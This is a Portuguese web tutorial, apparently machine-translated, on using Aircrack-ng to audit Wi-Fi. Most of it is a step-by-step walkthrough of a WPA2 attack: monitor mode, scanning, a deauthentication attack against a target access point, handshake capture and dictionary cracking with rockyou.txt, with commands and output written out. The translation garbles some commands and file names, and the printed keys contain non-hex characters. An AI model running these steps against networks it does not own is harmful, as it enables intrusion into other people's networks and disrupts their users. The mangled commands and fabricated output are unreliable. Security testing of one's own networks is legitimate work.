aircrack

Como usar o Aircrack-ng

Como usar o Aircrack-ng
Na maioria das vezes, as pessoas nunca pensam na rede à qual estão conectadas. Eles nunca pensam como essa rede é segura e quanto arriscam seus dados confidenciais diariamente. Você pode executar verificações de vulnerabilidade em suas redes wi-fi usando uma ferramenta muito poderosa chamada Aircrack-ng e Wireshark. Wireshark é usado para monitorar a atividade de rede. Aircrack-ng é mais como uma ferramenta agressiva que permite hackear e dar acesso a conexões sem fio. Pensar como um intruso sempre foi a maneira mais segura de se proteger contra um hack. Você pode ser capaz de compreender as ações exatas que um intruso executará para obter acesso ao seu sistema, aprendendo sobre o aircrack. Você pode então conduzir verificações de conformidade em seu próprio sistema para garantir que não seja inseguro.

Aircrack-ng é um conjunto completo de software desenvolvido para testar a segurança da rede WiFi. Não é apenas uma ferramenta única, mas uma coleção de ferramentas, cada uma das quais desempenha um propósito específico. Diferentes áreas de segurança wi-fi podem ser trabalhadas, como monitorar o ponto de acesso, testar, atacar a rede, quebrar a rede wi-fi e testá-la. O principal objetivo do Aircrack é interceptar os pacotes e decifrar os hashes para quebrar as senhas. Suporta quase todas as novas interfaces sem fio. Aircrack-ng é uma versão melhorada de um conjunto de ferramentas desatualizado Aircrack, ng refere-se ao Nova geração. Algumas das ferramentas incríveis que funcionam juntas para realizar uma tarefa maior.

Airmon-ng:

Airmon-ng está incluído no kit aircrack-ng que coloca a placa de interface de rede no modo monitor. As placas de rede geralmente só aceitarão pacotes direcionados a eles conforme definido pelo endereço MAC da NIC, mas com o airmon-ng, todos os pacotes wireless, sejam eles direcionados a eles ou não, também serão aceitos. Você deve ser capaz de capturar esses pacotes sem vincular ou autenticar com o ponto de acesso. É usado para verificar o status de um ponto de acesso, colocando a interface de rede no modo monitor. Em primeiro lugar, é necessário configurar as placas sem fio para ligar o modo de monitor, então matar todos os processos em segundo plano se você achar que algum processo está interferindo neles. Após encerrar os processos, o modo monitor pode ser habilitado na interface sem fio executando o comando abaixo:

[email protegido]: ~ $ sudo airmon-ng start wlan0 #

Você também pode desativar o modo de monitor interrompendo o airmon-ng a qualquer momento usando o comando abaixo:

[email protegido]: ~ $ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng é usado para listar todas as redes que nos rodeiam e para visualizar informações valiosas sobre elas. A funcionalidade básica do airodump-ng é farejar pacotes, então ele é essencialmente programado para pegar todos os pacotes ao nosso redor enquanto é colocado no modo monitor. Vamos executá-lo em todas as conexões ao nosso redor e coletar dados como o número de clientes conectados à rede, seus endereços mac correspondentes, estilo de criptografia e nomes de canais e, em seguida, começar a direcionar nossa rede de destino.

Digitando o comando airodump-ng e dando a ele o nome da interface de rede como parâmetro, podemos ativar esta ferramenta. Ele listará todos os pontos de acesso, a quantidade de pacotes de dados, métodos de criptografia e autenticação usados ​​e o nome da rede (ESSID). Do ponto de vista do hacking, os endereços mac são os campos mais importantes.

[email protegido]: ~ $ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack é usado para quebrar senhas. Depois de capturar todos os pacotes usando o airodump, podemos quebrar a chave pelo aircrack. Ele quebra essas chaves usando dois métodos PTW e FMS. A abordagem PTW é feita em duas fases. No início, apenas os pacotes ARP estão sendo usados, e só então, se a chave não for quebrada após a busca, ele usa todos os outros pacotes capturados. Um ponto positivo da abordagem PTW é que nem todos os pacotes são usados ​​para o cracking. Na segunda abordagem, eu.e., FMS, usamos os modelos estatísticos e os algoritmos de força bruta para quebrar a chave. Um método de dicionário também pode ser usado.

Aireplay-ng:

Airplay-ng apresenta pacotes a uma rede sem fio para criar ou acelerar o tráfego. Pacotes de duas fontes diferentes podem ser capturados por aireplay-ng. O primeiro é a rede ativa e o segundo são os pacotes do arquivo pcap já existente. Airplay-ng é útil durante um ataque de desautenticação que visa um ponto de acesso sem fio e um usuário. Além disso, você pode realizar alguns ataques como o ataque com café com leite com airplay-ng, uma ferramenta que permite obter uma chave do sistema do cliente.  Você pode conseguir isso capturando um pacote ARP e, em seguida, manipulando-o e enviando-o de volta ao sistema. O cliente irá então criar um pacote que pode ser capturado pelo airodump e o aircrack quebra a chave desse pacote modificado. Algumas outras opções de ataque de airplay-ng incluem chopchop, fragment arepreplay, etc.

Airbase-ng:

Airbase-ng é usado para transformar o computador de um invasor em um ponto de conexão comprometido para que outros se conectem. Usando Airbase-ng, você pode reivindicar ser um ponto de acesso legal e conduzir ataques man-in-the-middle em computadores que estão conectados à sua rede. Esses tipos de ataques são chamados de Ataques Gêmeos Malignos. É impossível para os usuários básicos discernir entre um ponto de acesso legal e um ponto de acesso falso. Portanto, a ameaça gêmea do mal está entre as ameaças sem fio mais ameaçadoras que enfrentamos hoje.

Airolib-ng:

Airolib acelera o processo de hacking, armazenando e gerenciando as listas de senha e o ponto de acesso. O sistema de gerenciamento de banco de dados usado por este programa é o SQLite3, que está disponível principalmente em todas as plataformas. A quebra de senha inclui o cálculo da chave mestra par a par através da qual a chave transitória privada (PTK) é extraída. Usando o PTK, você pode determinar o código de identificação da mensagem do quadro (MIC) para um determinado pacote e, teoricamente, encontrar o MIC semelhante ao pacote, portanto, se o PTK estava certo, o PMK também estava certo.

Para ver as listas de senhas e acessar redes armazenadas no banco de dados, digite o seguinte comando:

[email protegido]: ~ $ sudo airolib-ng testdatabase -stats

Aqui testdatabase é o banco de dados que você deseja acessar ou criar e -stats é a operação que deseja realizar nele. Você pode fazer várias operações nos campos do banco de dados, como dar prioridade máxima a algum SSID ou algo assim. Para usar airolib-ng com aircrack-ng, digite o seguinte comando:

[email protegido]: ~ $ sudo aircrack-ng -r testdatabase wpa2.eapol.boné

Aqui estamos usando os PMKs já calculados armazenados no banco de dados de teste para acelerar o processo de quebra de senha.

Cracking WPA / WPA2 usando Aircrack-ng:

Vejamos um pequeno exemplo do que o Aircrack-ng pode fazer com a ajuda de algumas de suas incríveis ferramentas.  Vamos quebrar a chave pré-compartilhada de uma rede WPA / WPA2 usando um método de dicionário.

A primeira coisa que precisamos fazer é listar as interfaces de rede que suportam o modo monitor. Isso pode ser feito usando o seguinte comando:

[email protegido]: ~ $ sudo airmon-ng
Chipset de driver de interface PHY
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Podemos ver uma interface; agora, temos que colocar a interface de rede que encontramos (wlx0) no modo monitor usando o seguinte comando:

[email protegido]: ~ $ sudo airmon-ng start wlx0

Ele habilitou o modo de monitor na interface chamada wlx0mon.

Agora devemos começar a ouvir as transmissões de roteadores próximos por meio de nossa interface de rede que colocamos no modo monitor.

[email protegido]: ~ $ sudo airodump-ng wlx0mon
CH 5] [Decorrido: 30 s] [2020-12-02 00:17
 
BSSID PWR Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSID
 
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54e WPA2 CCMP PSK CrackIt
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54e. WPA2 CCMP PSK HAckme
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54e WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54e WPA2 CCMP PSK TP-Link_3802
 
Sonda de quadros perdidos de taxa de PWR da ESTAÇÃO BSSID
 
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0e- 1 1002 13 

Nossa rede alvo é Quebrar neste caso, que está sendo executado no canal 1.

Aqui, a fim de quebrar a senha da rede de destino, precisamos capturar um handshake de 4 vias, que acontece quando um dispositivo tenta se conectar a uma rede. Podemos capturá-lo usando o seguinte comando:

[email protegido]: ~ $ sudo airodump-ng -c 1 --bssid E4: 6F: 13: 04: CE: 31 -w / home wlx0

-c         : Canal

-bssid: Bssid da rede alvo

-C        : O nome do diretório onde o arquivo pcap será colocado

Agora temos que esperar que um dispositivo se conecte à rede, mas há uma maneira melhor de capturar um aperto de mão. Podemos desautenticar os dispositivos para o AP usando um ataque de desautenticação usando o seguinte comando:

[email protegido]: ~ $ sudo aireplay-ng -0 -a E4: 6F: 13: 04: CE: 31

uma: Bssid da rede alvo

-0: Ataque de desautenticação

Desconectamos todos os dispositivos e agora temos que esperar que um dispositivo se conecte à rede.

CH 1] [Decorrido: 30 s] [2020-12-02 00:02] [handshake WPA: E4: 6F: 13: 04: CE: 31
 
BSSID PWR RXQ Beacons #Data, # / s CH MB ENC CIPHER AUTH E
 
E4: 6F: 13: 04: CE: 31 -47 1 228 807 36 1 54e WPA2 CCMP PSK P
 
Sonda de quadros perdidos de taxa de PWR da ESTAÇÃO BSSID
 
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0e- 1e 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7E -31 0e 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 CrackIt
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ED: E3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1            

Conseguimos um acerto e, olhando para o canto superior direito ao lado da hora, podemos ver que um aperto de mão foi capturado. Agora procure na pasta especificada ( /casa no nosso caso) para um “.pcap" Arquivo.

Para quebrar a chave WPA, podemos usar o seguinte comando:

[email protegido]: ~ $ sudo aircrack-ng -a2 -w rockyou.txt -b E4: 6F: 13: 04: CE: 31 aperto de mão.boné
b: Bssid da rede alvo
-a2: modo WPA2
Rockyou.txt: O arquivo de dicionário usado
Aperto de mão.cap: O arquivo que contém o aperto de mão capturado
Aircrack-ng 1.2 beta3
[00:01:49] 10566 chaves testadas (1017.96 k / s)
CHAVE ENCONTRADA! [ você me pegou ]
Chave Mestra: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Chave transitória: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

A chave da nossa rede alvo foi quebrada com sucesso.

Conclusão:

As redes sem fio estão em toda parte, usadas por todas as empresas, desde funcionários que usam smartphones até dispositivos de controle industrial. De acordo com a pesquisa, quase mais de 50 por cento do tráfego da Internet será via WiFi em 2021.  As redes sem fio têm muitas vantagens, comunicação externa, acesso rápido à internet em locais onde é quase impossível conectar cabos, podem expandir a rede sem instalar cabos para qualquer outro usuário e podem conectar facilmente seus dispositivos móveis a seus escritórios domésticos enquanto você não está lá.

Apesar dessas vantagens, há um grande ponto de interrogação sobre sua privacidade e segurança. Como essas redes; dentro da faixa de transmissão de roteadores estão abertos a todos, eles podem ser facilmente atacados e seus dados podem ser facilmente comprometidos. Por exemplo, se você estiver conectado a algum wi-fi público, qualquer pessoa conectada a essa rede pode facilmente verificar o tráfego da rede usando alguma inteligência e com a ajuda de ferramentas incríveis disponíveis e até mesmo descartá-lo.

O botão esquerdo do mouse não funciona no Windows 10
Se você estiver usando um mouse dedicado com seu laptop ou computador desktop, mas o o botão esquerdo do mouse não funciona no Windows 10/8/7 por algu...
O cursor pula ou se move aleatoriamente enquanto digita no Windows 10
Se você descobrir que o cursor do mouse pula ou se move por conta própria, de forma automática e aleatória ao digitar em um laptop ou computador com W...
Como reverter a direção de rolagem do Mouse e Touchpads no Windows 10
Mouse e Touchpads não apenas torna a computação mais fácil, mas mais eficiente e menos demorada. Não podemos imaginar uma vida sem esses dispositivos,...